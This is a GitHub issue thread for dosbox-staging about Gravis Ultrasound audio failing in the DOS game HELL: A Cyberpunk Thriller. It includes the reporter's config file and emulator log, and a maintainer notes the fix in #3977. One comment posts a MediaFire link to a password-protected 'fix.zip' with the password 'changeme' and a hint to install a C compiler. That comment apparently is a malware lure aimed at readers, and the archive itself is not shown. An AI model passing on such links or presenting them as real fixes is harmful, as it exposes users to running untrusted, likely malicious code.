### ISSUE TITLE
GUS Music does not play while playing HELL: A Cyberpunk Thriller

### ISSUE THREAD

**Issue by Tucky27** [dosbox-staging/dosbox-staging#3963]
### Are you using the latest Dosbox-Staging Version?

- [X] I have checked releases and am using the latest release.

### Different version than latest?

0.82.0-rc1

### What Operating System are you using?

Windows 10

### Relevant hardware info

Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz; Nvidia 1060 GTX

### Have you checked that no other similar issue already exists?

- [X] I have searched and not found similar issues.

### A clear and concise description of what the bug is.

When running the game with GUS configured for both music/sounds no music or sound will play with Staging but there is music if running through DOSBOX-X in the intro only. In game DOSBOX-X will play the speech but no music with this setup but Staging is completely silent.

If configuring with GUS music only Staging will play the intro music but is silent in game completely. In the discrepancies there maybe a emulation issue.

### Steps to reproduce the behaviour.

Explain how to reproduce
1. Run the Setup utility and configure for GUS music and sound
2. Play the game and you will hear silence in Staging
3. If configuring for GUS music only you will hear the intro playing but no in game music in Staging
4. If configuring for GUS music and Sounds in Dosbox-X you will hear the intro music but no music in game. In game sounds like people speaking will be heard however althrough it did sound a little off in DOSBOX-X. No speaking can be heard in Staging with GUS selected as sound.

P.S I can confirm that my ULTRASND directory is correct and working for other games.

### Download URL of affected game or software

https://www.retro-exo.com/exodos.html

### Your configuration

```ini
# Config file for "Hell: A Cyberpunk Thriller"

[sdl]
output=opengl
fullscreen=true
fullresolution=desktop
windowresolution=medium
window_titlebar=program="HELL: A Cyberpunk Thriller" cycles=off
priority=auto auto
mapperfile=mapper-sdl2-0.82.0-rc1.map

[dosbox]
machine=vesa_nolfb
memsize=63

[render]
aspect=auto
integer_scaling=vertical
glshader="H:\Games\DOSBox-0.74\DOSBOX Staging\latest\resources\glshaders\crt\vgatest-1080p.glsl"
#vga-1080p.glsl

[voodoo]
voodoo=false

[cpu]
core                 = dynamic
cputype              = pentium
cpu_cycles           = 50000
cpu_cycles_protected = 60000
cpu_throttle         = false
cycleup              = 10
cycledown            = 20

[mouse]
mouse_capture=onstart
mouse_middle_release=true
mouse_raw_input=true
dos_mouse_driver=true

[mixer]
nosound=false
rate=48000
blocksize=2048
prebuffer=35
negotiate=false
compressor=true
crossfeed=on
#Enable crossfeed globally on all stereo channels for headphone listening ie light, normal,strong
reverb = medium
chorus = strong

[midi]
mididevice = mt32
midiconfig=
mpu401=intelligent

[mt32]
model  = cm32l
romdir = "H:\Games\DOSBox-0.74\DOSBOX Staging\mt32"

[sblaster]
sbtype=sb16
sbbase=220
irq=7
dma=1
hdma=5
sbmixer=true
sbwarmup=100
#ie the pop the soundblaster made when turned on; 100 turns it off
oplmode=opl3
sb_filter=auto
opl_filter=auto
cms=off
cms_filter=on

[gus]
gus=true
gusbase=240
gusirq=5
gusdma=3
gus_filter = off
ultradir=C:\ULTRASND

[speaker]
pcspeaker=off
tandy=off
lpt_dac=none

[dos]
xms=true
ems=true
umb=false
ver=6.22
country=auto
keyboardlayout=auto

[joystick]
joysticktype=disabled

[serial]
serial1=dummy
serial2=dummy
serial3=disabled
serial4=disabled

[autoexec]
#This runs at startup
@echo off
MOUNT C "H:\Games\Take 2 Interactive\HELL - A Cyberpunk Thriller (1994)\"
IMGMOUNT D "H:\Games\Take 2 Interactive\HELL - A Cyberpunk Thriller (1994)\CD\HELL.iso" -t cdrom
#MOUNT D "L:\" -t cdrom
echo.
C:
cd\
cd \HELL
#setup.exe
#take2.exe
call HECK.BAT
exit
```

### Provide a Log

```text
date       time         |
2024-09-29 14:33:56.733 | arguments: H:\\Games\\DOSBox-0.74\\DOSBOX\ Staging\\latest\\dosbox.exe -conf dosbox_hell.conf
2024-09-29 14:33:56.734 | Current dir: H:\Games\DOSBox-0.74\DOSBOX Staging\latest
2024-09-29 14:33:56.734 | stderr verbosity: 0
2024-09-29 14:33:56.734 | -----------------------------------
2024-09-29 14:33:56.734 | dosbox-staging version 0.82.0-rc1 (9d55e)
2024-09-29 14:33:56.735 | ---
2024-09-29 14:33:56.735 | LOG: Loguru version 2.1.0 initialised
2024-09-29 14:33:56.740 | CONFIG: Loaded primary config file 'C:\Users\Andrew\AppData\Local\DOSBox\dosbox-staging.conf'
2024-09-29 14:33:56.742 | CONFIG: Loaded custom config file 'dosbox_hell.conf'
2024-09-29 14:33:56.742 | LANG: Using internal English language messages
2024-09-29 14:33:56.774 | SDL: version 2.30.3 initialised (windows video and wasapi audio)
2024-09-29 14:33:56.775 | DISPLAY: Using 854x640 window size in windowed mode on display-0
2024-09-29 14:33:57.274 | OPENGL: Vendor: NVIDIA Corporation
2024-09-29 14:33:57.274 | OPENGL: Version: 4.6.0 NVIDIA 551.52
2024-09-29 14:33:57.275 | OPENGL: GLSL version: 4.60 NVIDIA
2024-09-29 14:33:57.275 | OPENGL: NPOT textures supported
2024-09-29 14:33:57.292 | RENDER: Using shader 'H:\Games\DOSBox-0.74\DOSBOX Staging\latest\resources\glshaders\crt\vgatest-1080p.glsl'
2024-09-29 14:33:57.293 | VGA: Pixel doubling enabled
2024-09-29 14:33:57.293 | VIDEO: Using the DOS video mode's frame rate
2024-09-29 14:33:57.298 | MEMORY: Memory sizes above 31 MB aren't recommended for most DOS games
2024-09-29 14:33:57.308 | MEMORY: Using 16128 DOS memory pages (63 MB) at address: 0000029C80001060
2024-09-29 14:33:57.309 | VIDEO: Initialised S3 Trio64 VESA 2.0 compatible without LFB with 4 MB of FP DRAM supporting 92 modes
2024-09-29 14:33:57.314 | CAPTURE: Image capturer started
2024-09-29 14:33:57.335 | MIXER: Initialised stereo 48000 Hz audio with 2048 sample frame buffer
2024-09-29 14:33:57.335 | MIXER: Crossfeed enabled ('normal' preset)
2024-09-29 14:33:57.335 | MIXER: Reverb enabled ('medium' preset)
2024-09-29 14:33:57.336 | MIXER: Chorus enabled ('strong' preset)
2024-09-29 14:33:57.478 | MIXER: Master compressor enabled
2024-09-29 14:33:57.495 | MT32: Initialised CM-32L/LAPC-I Control v1.02 from ..\mt32
2024-09-29 14:33:57.507 | MT32: Operating at 48000 Hz without resampling
2024-09-29 14:33:57.507 | MIDI: Opened device: mt32
2024-09-29 14:33:57.508 | MPU-401: Running in intelligent mode on ports 330h and 331h
2024-09-29 14:33:57.508 | OPL: Operating at 49716 Hz and downsampling to the output rate
2024-09-29 14:33:57.510 | OPL: Running OPL3 on ports 220h and 388h
2024-09-29 14:33:57.510 | OPL: Sound Blaster 16 OPL output filter enabled
2024-09-29 14:33:57.511 | DMA: Initialised primary controller
2024-09-29 14:33:57.511 | DMA: Initialised secondary controller
2024-09-29 14:33:57.512 | SB: Operating at 22050 Hz and upsampling to the output rate
2024-09-29 14:33:57.512 | SB16: Sound Blaster 16 DAC output filter enabled
2024-09-29 14:33:57.513 | SB16: Setting 'BLASTER' environment variable to 'A220 I7 D1 H5 T6'
2024-09-29 14:33:57.513 | SB16: Running on port 220h, IRQ 7, DMA 1, and high DMA 5
2024-09-29 14:33:57.514 | GUS: Operating at 48000 Hz without resampling
2024-09-29 14:33:57.514 | GUS: Setting 'ULTRASND' environment variable to '240,3,3,5,5'
2024-09-29 14:33:57.514 | GUS: Setting 'ULTRADIR' environment variable to 'C:\ULTRASND'
2024-09-29 14:33:57.515 | GUS: Running on port 240h, IRQ 5, and DMA 3
2024-09-29 14:33:57.515 | MOUSE: Will be captured immediately on start
2024-09-29 14:33:57.515 | MOUSE: Middle button will capture/release the mouse (clicks not sent to the game/program)
2024-09-29 14:33:57.516 | MOUSE (PS/2): Standard, 3 buttons
2024-09-29 14:33:57.532 | DOS: Loaded modern locale for country 1, 'United States'
2024-09-29 14:33:57.532 | SLIRP: Slirp version: 4.8.0
2024-09-29 14:33:57.533 | SLIRP: Successfully initialized
2024-09-29 14:33:57.534 | NE2000: Initialised on port 300h and IRQ 3
2024-09-29 14:33:57.536 | CONFIG: Loaded auto-mounted drive config file 'resources\drives\y.conf'
2024-09-29 14:33:57.536 | AUTOEXEC: Using autoexec from one or more joined sections
2024-09-29 14:33:57.536 | MAPPER: Joystick subsystem disabled
2024-09-29 14:33:57.537 | MAPPER: Loaded default key bindings
2024-09-29 14:33:57.549 | SDL: Using standard SDI (auto) display refresh rate of 60 Hz
2024-09-29 14:33:57.648 | DISPLAY: VGA 720x400 16-colour text mode 03h at 70.087 Hz throttled VFR, scaled to 1067x800 pixels with 1:1.35 (20:27) pixel aspect ratio
2024-09-29 14:33:57.649 | OPENGL: Enabled non-adaptive vsync
2024-09-29 14:33:57.653 | MOUNT: Path 'resources\drives\y' found
2024-09-29 14:33:57.654 | MOUNT: Path 'H:\Games\Take 2 Interactive\HELL - A Cyberpunk Thriller (1994)' found
2024-09-29 14:33:57.655 | IMGMOUNT: Path 'H:\Games\Take 2 Interactive\HELL - A Cyberpunk Thriller (1994)\CD\HELL.iso' found
2024-09-29 14:33:57.656 | CDAUDIO: Operating at 48000 Hz without resampling
2024-09-29 14:33:57.673 | DISPLAY: VESA 640x480 256-colour graphics mode 101h at 70.007 Hz throttled VFR, scaled to 1280x960 pixels with 1:1 (1:1) pixel aspect ratio
2024-09-29 14:33:58.165 | GUS: Activated 14 voices at 44100 Hz
```

### Code of Conduct & Contributing Guidelines

- [X] Yes, I agree.

**Comment by SagarChandra07** [comment]
try this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme

you may need to install the c compiler

**Comment by interloper98** [comment]
Fixed in #3977

**Comment by johnnovak** [comment]
@Python-Exoproject Might be interesting to you.
